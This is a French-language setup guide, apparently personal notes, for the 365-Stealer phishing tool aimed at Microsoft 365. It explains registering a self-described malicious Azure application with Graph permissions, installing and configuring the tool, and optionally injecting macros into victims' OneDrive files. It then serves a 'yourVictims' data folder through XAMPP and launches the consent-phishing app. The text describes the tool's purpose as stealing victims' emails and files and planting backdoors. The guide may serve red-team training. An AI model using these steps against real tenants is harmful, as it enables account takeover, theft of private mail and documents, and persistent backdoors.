o365-Stealer

Def et fonctionnement :

O365 est un outil qui permet de faire du phishing, de l'exfiltration de données en ayant accès aux emails de la victime, de faire des backdoor et de récupérer les fichiers téléchargés sur OneDrive.
https://github.com/AlteredSecurity/365-Stealer
https://www.youtube.com/watch?v=51FSvndgddk
https://www.youtube.com/watch?v=22ku67tElkI

Installation :

(Optionnel) La toute première étape du projet est de créer un sous-domaine pour notre app : notbackdoor
Pasted image 20240607154737.png

App Registration :

On doit enregistrer d'abord une application malicieuse pour azure :
Pasted image 20240607135556.png
Pasted image 20240607155135.png
Dans l'application :
Pasted image 20240607152155.png
Et on doit ensuite récupérer la value de ce secret.
On ajoute ensuite les permissions API :
API permissions -> Add a permission -> Microsoft Graph -> Delegated permissions et on ajoute ensuite les permissions que l'on veut :
Pasted image 20240607160700.png

Installer de O365-Stealer

Installer les prérequis :

sudo apt update
sudo apt install git python3 pip -y

Installer O365

git clone https://github.com/AlteredSecurity/365-Stealer
cd 365-Stealer/
pip install -r requirements.txt

Configurer O365-Stealer

  1. Pour cela on doit lancer :
    python3 365-Stealer.py --set-config
  2. Sur notre tenant on copie l'application ID, notre secret value et notre redirect URL : Pasted image 20240607163315.png
  3. Ajouter une URL de redirect
  4. (Optionnel)ajouter des macros à injecter dans les fichiers du OneDrive de la victime pour le moment on en fait pas Pasted image 20240618152647.png
  5. (Optionnel )Pour faire la conf avec un GUI il faut utiliser XAMPP on download l'installer dans /downloads et ensuite :
    cd /downloads
chmod 755 xampp-linux-x64-8.0.30-0-installer.run
sudo ./xampp-linux-x64-8.0.30-0-installer.run
    il sera installé dans /opt/lampp donc pour le lancer :
    sudo /opt/lampp/lampp start
    Pasted image 20240618154254.png
    Il faut ensuite set la page par défaut dans /opt/lampp/apache2/conf/httpd.conf :
    DocumentRoot "/home/azureuser/365-Stealer/yourVictims/"
<Directory "/home/azureuser/365-Stealer/yourVictims/">
    Require all granted
 </Directory>
    et enfin :
    sudo chown -R 755 yourVictims/
sudo /opt/lampp/lampp restart
    Pasted image 20240618160333.png
  6. Démarrer 365-Stealer avec :
    python3 365-Stealer.py --port 5067 --run-app --no-ssl

On a donc le site web :
Pasted image 20240613172906.png
et l'application :
Pasted image 20240618175122.png